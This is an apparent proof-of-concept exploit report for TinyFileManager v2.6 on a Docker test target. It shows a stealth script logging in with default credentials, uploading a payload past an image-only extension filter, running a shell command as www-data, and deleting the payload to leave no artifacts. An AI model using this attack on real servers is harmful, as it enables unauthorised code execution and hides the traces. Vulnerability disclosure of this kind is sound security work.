- Target: Docker php:8.1-apache
- TinyFileManager: v2.6 (latest)
- Config:
$allowed_upload_extensions = 'jpg,png,gif'
$ python tfm_stealth.py "http://localhost:8086/tinyfilemanager.php" "id && hostname"
[+] Authenticated with admin:admin@123
[+] Payload uploaded
============================================================
Command Output:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
13dc3995ac99
============================================================
[+] Payload self-destructed - no artifacts
[+] SUCCESS
(Add screenshots to proof/ directory)
- Login page
- Successful exploitation
- Command output
- No artifacts remaining
(Optional: Add screen recording)